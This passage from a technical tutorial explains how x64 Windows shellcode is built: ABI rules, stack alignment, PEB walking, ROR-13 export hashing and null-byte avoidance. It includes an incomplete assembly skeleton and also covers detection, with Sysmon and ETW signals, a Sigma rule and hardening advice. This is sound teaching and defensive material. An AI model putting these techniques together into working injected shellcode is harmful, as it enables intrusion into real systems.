; --- x64 fastcall: same call ---
xor rcx, rcx ; hWnd = NULL
lea rdx, [rel msg] ; lpText
lea r8, [rel title] ; lpCaption
xor r9d, r9d ; uType = 0
sub rsp, 0x28 ; shadow space + alignment (see §4)
call [rel MessageBoxA]
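add rsp, 0x28
Note xor r9d, r9d rather than xor r9, r9: writing to the 32-bit sub-register zero-extends to the full 64-bit register. Both forms are null-free. For R8–R15 they are the same length (three bytes, since a REX prefix is needed either way); for the legacy registers the 32-bit form is one byte shorter (xor ecx, ecx is 31 C9, xor rcx, rcx is 48 31 C9).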

3. Shadow Space: Why, What, and Where
In the Microsoft x64 convention the caller must reserve 32 bytes (4 × 8) of stack immediately above the return address as shadow space (also called home space or spill space). This area exists so the callee has somewhere to spill RCX, RDX, R8, and R9 back to memory if it needs to take their addresses or free up the registers for re-use.
Critical points:
- Shadow space is always reserved, even when the callee takes fewer than four arguments and even when the callee never spills.
- It is owned by the caller. The callee may overwrite it without saving the previous contents.
- The caller does not zero or initialise it. The callee is responsible for whatever it writes there.
- Stack arguments beyond the fourth begin at [RSP + 0x28] as seen by the callee on entry (8 bytes return address + 32 bytes shadow).
| Layout immediately after call, before callee prologue | Offset from RSP |
|---|---|
| Return address (pushed by call) | [RSP + 0x00] |
| Shadow slot for RCX | [RSP + 0x08] |
| Shadow slot for RDX | [RSP + 0x10] |
| Shadow slot for R8 | [RSP + 0x18] |
| Shadow slot for R9 | [RSP + 0x20] |
| 5th argument (if any) | [RSP + 0x28] |
Skip the shadow allocation and the first thing the callee does, often a mov [rsp+8], rcx early in a Win32 prologue, clobbers your own stack data or, worse, the return address your shellcode needs to get back to its caller.
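The slot layout follows one rule: argument n lives 8 bytes per slot above the return address. A short Python sketch of that arithmetic follows; the function names are hypothetical, and the offsets are relative to RSP either at callee entry or at the call site just before the call instruction executes.

```python
SLOT = 8  # every argument slot and the return address are 8 bytes wide


def callee_entry_offset(arg_index):
    """Offset from RSP at callee entry of the slot for the 1-based argument."""
    if arg_index < 1:
        raise ValueError("arguments are numbered from 1")
    return SLOT + SLOT * (arg_index - 1)   # skip the return address first


def call_site_offset(arg_index):
    """Offset from RSP just before the call, i.e. without a return address."""
    if arg_index < 1:
        raise ValueError("arguments are numbered from 1")
    return SLOT * (arg_index - 1)


if __name__ == "__main__":
    for n in range(1, 7):
        kind = "home slot" if n <= 4 else "stack argument"
        print(f"arg {n}: callee [rsp+{callee_entry_offset(n):#04x}] "
              f"caller [rsp+{call_site_offset(n):#04x}] ({kind})")
```

This is why a caller that passes a fifth argument stores it at [rsp + 0x20] before the call, and the callee finds it at [rsp + 0x28] on entry.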

4. Stack Alignment in Practice
The Microsoft x64 ABI requires RSP to be 16-byte aligned at the moment of a call, except inside a prolog. The hardware call then pushes an 8-byte return address, so on entry to the callee RSP is 16N + 8 aligned. Win32 internals (memcpy, CRT, anything that uses SSE/AVX with aligned moves) will issue movaps / movdqa against stack locations and will raise EXCEPTION_ACCESS_VIOLATION (0xC0000005) if RSP is wrong by 8.
This is why the canonical shellcode prologue is sub rsp, 0x28, not 0x20:
- 0x20 (32 bytes) for shadow space.
- + 0x08 to undo the misalignment the preceding call introduced.
; Canonical shellcode call wrapper
sub rsp, 0x28 ; 32B shadow + 8B realign
call rax ; rax = resolved API address
add rsp, 0x28
When the shellcode entry itself was reached by a jump from unknown context, force alignment explicitly:
; Defensive entry: align RSP regardless of caller state
and rsp, 0xFFFFFFFFFFFFFFF0 ; force 16-byte alignment
sub rsp, 0x20 ; shadow space only: RSP is already aligned, so no extra 8 bytes
To diagnose alignment faults in WinDbg, dump the faulting instruction (u .) and check whether it is a movaps / movdqa referencing [rsp+…]. If rsp & 0xF == 0x8 at the call, the frame adjustment is off by 8: either the + 0x08 was forgotten after a call-style entry, or it was added on top of an explicit and rsp.
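The choice between 0x20 and 0x28 depends only on the value of RSP modulo 16 when the adjustment is made, which is easy to check with plain arithmetic. The Python sketch below models the two entry styles; the function name and the sample stack addresses are hypothetical.

```python
def aligned_at_call(entry_rsp, force_align, frame):
    """Model RSP at the moment of an API call.

    entry_rsp   -- RSP when the stub starts executing
    force_align -- True if the stub runs `and rsp, -16` first
    frame       -- bytes subtracted by `sub rsp, frame`
    """
    rsp = entry_rsp
    if force_align:
        rsp &= ~0xF          # and rsp, 0xFFFFFFFFFFFFFFF0
    rsp -= frame             # sub rsp, frame
    return rsp % 16 == 0


if __name__ == "__main__":
    via_call = 0x14FF08      # hypothetical: entered by call, so RSP = 16N + 8
    via_jump = 0x14FF00      # hypothetical: entered by jump with RSP = 16N
    cases = [
        ("call entry, sub 0x28", via_call, False, 0x28),
        ("call entry, sub 0x20", via_call, False, 0x20),
        ("forced align, sub 0x20", via_jump, True, 0x20),
        ("forced align, sub 0x28", via_call, True, 0x28),
    ]
    for label, rsp, force, frame in cases:
        state = "aligned" if aligned_at_call(rsp, force, frame) else "MISALIGNED"
        print(f"{label}: {state}")
```

The model shows that 0x28 is correct only when the stub was entered with RSP at 16N + 8. Once RSP has been forced to a 16-byte boundary, the frame must itself be a multiple of 16, so 0x20 (or 0x30) keeps the call aligned and 0x28 does not.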
5. Position-Independent Code Fundamentals
Shellcode does not know where it will land. Hard-coded addresses are forbidden — ASLR randomises module bases per boot, and the shellcode itself is dropped at an allocator-chosen address. Two x64 idioms enable position independence:
- RIP-relative addressing. lea rax, [rel label] resolves to lea rax, [rip + disp32] and produces correct results regardless of load address. This is the preferred way to reference embedded data in x64 shellcode.
- call/pop delta trick. A call to the next instruction pushes its return address, which is the runtime location of the following label. The code at that label pops it into a register to obtain a base for subsequent offsets.
; Obtain the runtime address of `data` without RIP-relative encoding
call get_rip
get_rip:
pop rbx ; rbx = runtime address of get_rip (this instruction)
lea rsi, [rbx + data - get_rip]
jmp continue
data:
db "kernel32.dll", 0
continue:
In practice, prefer lea reg, [rel label] for clarity; reach for call/pop only when an encoder demands it (for example, to avoid certain bad bytes).
6. PEB Walking: Finding kernel32.dll Without Imports
Because shellcode has no import table, it must walk the loader’s in-memory bookkeeping to find kernel32.dll and then resolve GetProcAddress / LoadLibraryA from its exports. On x64 Windows the chain starts at GS and uses these offsets:
| Step | Source | Field | Offset (x64) |
|---|---|---|---|
| 1 | GS segment | → TEB | — |
| 2 | TEB | ProcessEnvironmentBlock | +0x060 |
| 3 | PEB | Ldr → PEB_LDR_DATA | +0x018 |
| 4 | PEB_LDR_DATA | InMemoryOrderModuleList | +0x020 |
| 5 | LDR_DATA_TABLE_ENTRY link | InMemoryOrderLinks.Flink | +0x000 |
| 6 | LDR_DATA_TABLE_ENTRY | DllBase (relative to InMemoryOrderLinks) | +0x020 (+0x030 from the start of the entry) |
The InMemoryOrderModuleList on a normal process begins with the executable, then ntdll.dll, then kernel32.dll. Walking two Flinks from the first entry reaches the kernel32.dll entry. Production-grade shellcode hashes the BaseDllName string rather than trusting that order, both for resilience (the order is a loader convention, not a guarantee) and because some EDR products reportedly perturb the head of the list as a tripwire (see §11).
; --- PEB walk skeleton: locate kernel32.dll base in rax ---
xor eax, eax
mov rbx, [gs:0x60] ; TEB -> PEB
mov rbx, [rbx + 0x18] ; PEB -> Ldr (PEB_LDR_DATA)
mov rbx, [rbx + 0x20] ; -> InMemoryOrderModuleList.Flink
; (points into 1st LDR_DATA_TABLE_ENTRY's InMemoryOrderLinks)
mov rbx, [rbx] ; advance: -> 2nd entry (ntdll)
mov rbx, [rbx] ; advance: -> 3rd entry (kernel32)
mov rax, [rbx + 0x20] ; DllBase: entry + 0x30, i.e. InMemoryOrderLinks (entry + 0x10) + 0x20
; rax now holds kernel32.dll base address
To verify the offsets against the target OS build, drop into WinDbg on a live process and dump the structures directly:
0:000> dt ntdll!_TEB ProcessEnvironmentBlock
0:000> dt ntdll!_PEB Ldr
0:000> dt ntdll!_PEB_LDR_DATA InMemoryOrderModuleList
0:000> dt ntdll!_LDR_DATA_TABLE_ENTRY DllBase BaseDllName
0:000> !lmi kernel32
7. Parsing the Export Address Table
With kernel32.dll's base in hand, the shellcode walks the PE headers to the Export Directory and then iterates AddressOfNames, comparing each name against a precomputed hash. String literals like "GetProcAddress" are avoided to defeat trivial signatures and to remove embedded nulls.
Key offsets from a loaded module base:
| Field | Offset |
|---|---|
| e_lfanew (RVA of PE header) | DllBase + 0x3C |
| Optional Header | PE_header + 0x18 |
| Export Directory RVA (PE32+) | OptHeader + 0x70 |
| AddressOfFunctions | ExportDir + 0x1C |
| AddressOfNames | ExportDir + 0x20 |
| AddressOfNameOrdinals | ExportDir + 0x24 |
; --- EAT walk outline: resolve an export by ROR-13 name hash ---
; in : rax = module base, ebp = target hash (e.g. for "GetProcAddress")
; out: rax = exported function address (or 0)
mov ecx, [rax + 0x3C] ; e_lfanew
add rcx, rax ; rcx = PE header
mov edx, [rcx + 0x88] ; Export Directory RVA (OptHdr + 0x70)
add rdx, rax ; rdx = IMAGE_EXPORT_DIRECTORY
mov r8d, [rdx + 0x18] ; NumberOfNames
mov r9d, [rdx + 0x20] ; AddressOfNames RVA
add r9, rax
xor r10, r10 ; index
.next_name:
mov esi, [r9 + r10*4] ; name RVA
add rsi, rax ; rsi -> ASCII export name
xor edi, edi ; hash accumulator
.hash_byte:
movzx r11d, byte [rsi] ; scratch register: rax must keep the module base for the next iteration
test r11b, r11b
jz .check
ror edi, 13
add edi, r11d
inc rsi
jmp .hash_byte
.check:
cmp edi, ebp ; compare ROR-13 hash
je .found
inc r10
cmp r10d, r8d
jb .next_name
xor rax, rax ; not found
ret
.found:
; resolve via AddressOfNameOrdinals + AddressOfFunctions
; (omitted for brevity)
ret
The ROR-13 rotate-and-add hash, popularised by the Metasploit block_api stub, is the de facto standard, which is precisely why defenders now key on it (see §11).
8. Null-Byte and Bad-Character Avoidance
Shellcode delivered through a string-copy primitive (strcpy, lstrcatA, format-string echo) is truncated at the first null byte. x64 immediates routinely embed nulls because most useful constants and addresses do not occupy all 64 bits.
| Problem | Fix |
|---|---|
| mov rax, 0x000000007FFE1234 (imm64 form) → nulls | mov eax, 0x7FFE1234 (the 32-bit write zero-extends into RAX) |
| 64-bit literal in mov r9, imm64 | lea r9, [rel label] or build via shifts/ORs |
| push 0 → encodes 6A 00 | xor rcx, rcx ; push rcx |
| mov rcx, 0 → 7-byte encoding with four nulls | xor ecx, ecx |
; --- Null-byte comparison ---
; BAD: mov rax, 0x76ab1234 in its full imm64 encoding
; (some assemblers pick a shorter form automatically)
; 48 B8 34 12 AB 76 00 00 00 00 <-- four null bytes
mov rax, 0x76ab1234
; GOOD: zero-extend via 32-bit sub-register
; B8 34 12 AB 76 <-- mov eax, 0x76AB1234
mov eax, 0x76ab1234
Writing to EAX implicitly zeroes the upper 32 bits of RAX, so no preceding xor eax, eax is needed. This single architectural rule eliminates most accidental nulls in shellcode constants.
A short Python lab to validate a candidate snippet:
from keystone import Ks, KS_ARCH_X86, KS_MODE_64
asm = b"""
xor eax, eax
mov eax, 0x76ab1234
mov rbx, qword ptr gs:[0x60]
mov rbx, qword ptr [rbx + 0x18]
"""
ks = Ks(KS_ARCH_X86, KS_MODE_64)
code, _ = ks.asm(asm)
buf = bytes(code)
print(buf.hex())
bad = [i for i, b in enumerate(buf) if b == 0x00]
print(f"length={len(buf)} bad_byte_offsets={bad}")
Run it, see exactly where nulls (or any other bad character) land, and rewrite the offending instruction.
9. Shellcode Skeleton: Putting It Together
The pieces combine into a recognisable x64 stub: align the stack, walk the PEB to find kernel32.dll, parse the EAT to resolve GetProcAddress and LoadLibraryA, and then call out through the standard ABI with proper shadow space.
[BITS 64]
_start:
    ; --- entry: defensively align stack ---
    and rsp, 0xFFFFFFFFFFFFFFF0 ; RSP is now 16-byte aligned (the entry RSP is discarded)
    sub rsp, 0x20 ; shadow space only; RSP stays aligned for every call
    ; --- locate kernel32.dll via PEB ---
    mov rbx, [gs:0x60] ; TEB -> PEB
    mov rbx, [rbx + 0x18] ; PEB -> Ldr
    mov rbx, [rbx + 0x20] ; InMemoryOrderModuleList.Flink
    mov rbx, [rbx] ; -> ntdll entry
    mov rbx, [rbx] ; -> kernel32 entry
    mov r15, [rbx + 0x20] ; r15 = kernel32 base (DllBase relative to InMemoryOrderLinks)
    ; --- resolve GetProcAddress via ROR-13 hash (call into eat_lookup) ---
    mov rcx, r15
    mov edx, 0x7C0DFCAA ; ROR-13("GetProcAddress") (illustrative)
    call eat_lookup ; rax = &GetProcAddress
    mov r14, rax
    ; --- call LoadLibraryA("user32.dll") via GetProcAddress ---
    mov rcx, r15 ; hModule = kernel32
    lea rdx, [rel s_LoadLibraryA]
    call r14 ; rax = &LoadLibraryA
    lea rcx, [rel s_user32]
    call rax ; rax = HMODULE user32
    ; --- ... continue resolution and API calls ...
    add rsp, 0x20
    ret ; only meaningful if the entry RSP was saved and restored first
s_LoadLibraryA: db "LoadLibraryA", 0
s_user32: db "user32.dll", 0
; eat_lookup: in rcx=module base, edx=ROR13 hash -> rax = export addr
eat_lookup:
    ; (see §7 for the inner loop)
    ret
Every block in the skeleton corresponds to one of the rules established above: and rsp followed by sub rsp, 0x20 for alignment and shadow space, gs:[0x60] for the PEB, [rbx + 0x20] for DllBase, lea with RIP-relative strings for PIC, and r14 / r15 carrying state across calls because callees must preserve non-volatile registers. A stub that returns to its host must itself save and restore rbx, r14, r15, and the entry rsp (see §2).
10. Common Attacker Techniques
| Technique | Description |
|---|---|
| PEB-walk API resolution | Locate kernel32.dll via gs:[0x60] chain, parse exports by hash |
| ROR-13 export hashing | Avoid embedded API name strings; survive static signature scans |
| RIP-relative PIC | lea reg, [rel label] to address embedded data without fixups |
| Sub-register zero-extension | mov eax, imm32 zero-extends into RAX, avoiding the zero padding of a 64-bit immediate |
| Shadow-space-aware call wrapping | Align RSP to 16 bytes and reserve 32 bytes of shadow space before every Win32 call from an unknown caller |
| Direct Win32 → Native API substitution | Call Nt* syscalls to bypass usermode hooks (T1106) |
| Reflective loading of a PE in memory | Shellcode bootstraps a full PE image without touching disk (T1620) |
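On the analysis side, hashed API names are usually recovered by precomputing the hash of every export name and looking the observed constant up in that table. The following is a minimal sketch of that workflow, assuming the simple ROR-13 variant (rotate right by 13, then add each ASCII byte of the name, terminator excluded). Real samples vary the rotation count, fold in the module name, or include the terminator, so the function names and the short export list here are illustrative only.

```python
def ror32(value: int, count: int) -> int:
    """Rotate a 32-bit value right by count bits."""
    count %= 32
    return ((value >> count) | (value << (32 - count))) & 0xFFFFFFFF


def ror13_hash(name: str) -> int:
    """Simple ROR-13 additive hash over the ASCII bytes of an export name."""
    h = 0
    for ch in name.encode("ascii"):
        h = (ror32(h, 13) + ch) & 0xFFFFFFFF
    return h


def build_lookup(export_names):
    """Reverse table: hash -> export name, for resolving constants in a sample."""
    return {ror13_hash(n): n for n in export_names}


# Hypothetical, truncated export list; a real table covers every export of the DLL.
names = ["LoadLibraryA", "GetProcAddress", "VirtualAlloc", "CreateThread"]
table = build_lookup(names)

observed = ror13_hash("VirtualAlloc")  # stand-in for a constant pulled from a sample
print(f"0x{observed:08X} -> {table.get(observed, 'unknown')}")
```

The same table can feed YARA or memory-scan rules that look for known hash constants instead of API name strings.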
11. Defensive Strategies & Detection
Shellcode is observable at multiple layers. The most reliable signals come from the behaviours the techniques above require, not from the byte patterns they happen to produce.
Sysmon events to enable and triage:
- EventID 1: Process Create. Unusual parent/child chains (browser, Office, mail client spawning cmd.exe / powershell.exe) are the cheapest, highest-yield signal.
- EventID 8: CreateRemoteThread. Cross-process thread creation into LSASS, browsers, or signed Windows binaries is high-fidelity.
- EventID 10: ProcessAccess. Watch GrantedAccess masks like 0x1FFFFF (full access) and 0x1010 (PROCESS_QUERY_LIMITED_INFORMATION + PROCESS_VM_READ, a read-only mask associated with credential dumping). Injection itself needs PROCESS_VM_WRITE (0x0020) and PROCESS_VM_OPERATION (0x0008).
- EventID 17/18: Pipe creation/connection, frequently used by shellcode-launched implants for C2.
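GrantedAccess masks are easier to triage once decoded into named rights. The sketch below uses the documented PROCESS_* access-right values from the Windows SDK; the helper names and the choice of which bits count as injection-capable are assumptions made for illustration.

```python
# Process-specific access rights (values from the Windows SDK headers).
PROCESS_RIGHTS = {
    0x0001: "PROCESS_TERMINATE",
    0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE",
    0x0040: "PROCESS_DUP_HANDLE",
    0x0400: "PROCESS_QUERY_INFORMATION",
    0x0800: "PROCESS_SUSPEND_RESUME",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}

# Assumption: a handle needs both of these before it can write remote memory.
INJECTION_BITS = 0x0008 | 0x0020  # PROCESS_VM_OPERATION | PROCESS_VM_WRITE


def decode_access(mask: int) -> list[str]:
    """Return the names of the process rights set in a GrantedAccess mask."""
    return [name for bit, name in PROCESS_RIGHTS.items() if mask & bit]


def allows_remote_write(mask: int) -> bool:
    """True when the mask grants the rights needed to write remote memory."""
    return (mask & INJECTION_BITS) == INJECTION_BITS


for raw in ("0x1FFFFF", "0x1410", "0x1010"):
    mask = int(raw, 16)
    print(raw, allows_remote_write(mask), decode_access(mask))
```

Decoding the mask this way separates read-only access, which points toward credential theft, from write-capable access, which points toward injection.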
ETW providers worth subscribing to in EDR pipelines:
- Microsoft-Windows-Kernel-Process: kernel-side process/thread/image events, including thread starts in another process.
- Microsoft-Windows-Threat-Intelligence (PPL-only): kernel-emitted events for memory operations such as NtAllocateVirtualMemory, NtProtectVirtualMemory, and NtWriteVirtualMemory. Because they originate below the syscall boundary, patching usermode hooks does not suppress them.
- Microsoft-Windows-Security-Auditing: handle and object access.
Audit policies: Audit Process Creation (Success) and Audit Kernel Object surface process creation (Event 4688) and kernel-object handle activity (Events 4656/4663) in the classic Security log for SIEM ingestion.
Behavioural signals defenders should hunt on:
- Threads with StartAddress in MEM_PRIVATE regions that are PAGE_EXECUTE_* and not backed by a file image.
- CallTrace containing UNKNOWN frames: the calling instruction lives in unbacked memory.
- The gs:[0x60] opcode pattern (65 48 8B 04 25 60 00 00 00 for mov rax, gs:[0x60]; the ModRM byte changes with the destination register) inside executable regions of non-system modules.
- ROR-13 hashing loops in memory scans.
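The opcode hunt in the list above can be prototyped against a dumped memory region. This is a minimal sketch, assuming the region is already available as bytes; the function name is illustrative, and the pattern only covers the mov r64, gs:[0x60] form with a SIB-encoded absolute displacement, so hits are triage leads and not verdicts.

```python
import re

# 65        GS segment override
# 48 / 4C   REX.W (4C also sets REX.R for r8-r15 destinations)
# 8B        mov r64, r/m64
# ModRM     mod=00, rm=100 (SIB follows); the reg field selects the destination
# 25        SIB: no index, disp32 base
# 60 00 00 00  displacement 0x60 (PEB pointer inside the TEB)
PEB_LOAD = re.compile(
    rb"\x65[\x48\x4c]\x8b[\x04\x0c\x14\x1c\x24\x2c\x34\x3c]\x25\x60\x00\x00\x00"
)


def find_peb_loads(region: bytes) -> list[int]:
    """Return offsets of instructions that load the PEB pointer from gs:[0x60]."""
    return [m.start() for m in PEB_LOAD.finditer(region)]


# Three NOPs, then `mov rbx, gs:[0x60]`, then ret.
sample = b"\x90\x90\x90" + bytes.fromhex("65488b1c2560000000") + b"\xc3"
print(find_peb_loads(sample))  # [3]
```

Legitimate code also reads the PEB, so results are most useful when restricted to unbacked executable regions and combined with the other signals in the list.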
Sigma sketch — suspicious cross-process access typical of shellcode injection:
title: Suspicious Cross-Process Access With Memory Read or Write Rights
logsource:
product: windows
service: sysmon
detection:
selection:
EventID: 10
GrantedAccess:
- '0x1FFFFF'
- '0x1410'
- '0x1010'
filter_legit:
SourceImage|endswith:
- '\MsMpEng.exe'
- '\WmiPrvSE.exe'
condition: selection and not filter_legit
level: high
Hardening to deploy on monitored endpoints:
- Arbitrary Code Guard (ACG): denies the PAGE_EXECUTE_* transition that turns a MEM_PRIVATE shellcode buffer into runnable code.
- Control Flow Guard (CFG): terminates the process on indirect calls to addresses not marked as valid call targets, which limits how a hijacked call can reach injected code.
- Attack Surface Reduction rules "Block Win32 API calls from Office macros" and "Block all Office applications from creating child processes": together they cut off the most common shellcode delivery vector.
- PPL-protected EDR with kernel ETW Ti subscription — preserves syscall-layer telemetry even when userland hooks are patched out.
A useful EDR tripwire is to permute the head of InMemoryOrderModuleList with stub entries: shellcode that walks two Flinks blindly resolves the decoy module, fails to find expected exports, and crashes — producing a high-fidelity detection.
12. Tools for x64 Shellcode Analysis
| Tool | Description | Link |
|---|---|---|
| NASM | Assembler for the snippets in this tutorial; emits raw binary for direct hex inspection | nasm.us |
| Keystone Engine | Programmatic assembler (Python bindings) for bad-character analysis labs | keystone-engine.org |
| x64dbg | User-mode debugger; trace shellcode through gs:[0x60] and EAT walks | x64dbg.com |
| WinDbg | Inspect _TEB, _PEB, _PEB_LDR_DATA, _LDR_DATA_TABLE_ENTRY on the target build | learn.microsoft.com |
| Ghidra / IDA | Static analysis of shellcode-bearing samples and reflective loader stubs | ghidra-sre.org |
| Volatility 3 | Memory forensics: enumerate suspicious MEM_PRIVATE + RX regions, hunt unbacked threads | volatilityfoundation.org |
| Process Hacker | Live triage of thread start addresses and memory protections | processhacker.sourceforge.io |
| Godbolt Compiler Explorer | Inspect MSVC-emitted x64 prologues to confirm ABI assumptions | godbolt.org |
13. MITRE ATT&CK Mapping
| Technique | MITRE ID | Detection |
|---|---|---|
| Process Injection (umbrella) | T1055 | Sysmon EventID 8 + EventID 10 with VM-write GrantedAccess |
| DLL Injection | T1055.001 | Image Load (EventID 7) of an unexpected DLL shortly after EventID 8/10 against the same target |
| Portable Executable Injection | T1055.002 | Volatility scans for PE headers in MEM_PRIVATE RX regions |
| APC Injection | T1055.004 | ETW Ti NtQueueApcThread to remote thread; APC routines pointing into unbacked memory |
| Process Hollowing | T1055.012 | Sysmon EventID 25 (ProcessTampering); EventID 1 for the child, followed by EventID 10 with write access from the parent |
| Native API | T1106 | ETW Ti syscall provider; direct Nt* calls outside ntdll |
| Obfuscated Files or Information | T1027 | YARA on ROR-13 loops; entropy heuristics on dropped payloads |
| Reflective Code Loading | T1620 | Unbacked RX memory with PE magic / no module image record |
Summary
- x64 Windows shellcode is governed by a strict ABI: argument registers RCX/RDX/R8/R9, return in RAX, a 32-byte shadow space, and 16-byte stack alignment at every call.
- The PEB is reached via gs:[0x60] on x64 (the TEB itself is the GS segment base); every offset in the walk (+0x18, +0x20, +0x30) differs from the x86 layout and must be verified against the target build.
- Position-independent API resolution combines a PEB walk to kernel32.dll with an EAT walk using ROR-13 name hashing to avoid embedded strings.
- Null-byte avoidance leans on 32-bit sub-register writes that zero-extend, RIP-relative lea, and XOR-then-push idioms.
- Detection is layered: Sysmon EventID 8/10 for injection chains, ETW Threat-Intelligence for syscall-level memory writes, behavioural hunts for unbacked RX regions, and ACG/CFG/ASR hardening to deny the primitives shellcode depends on.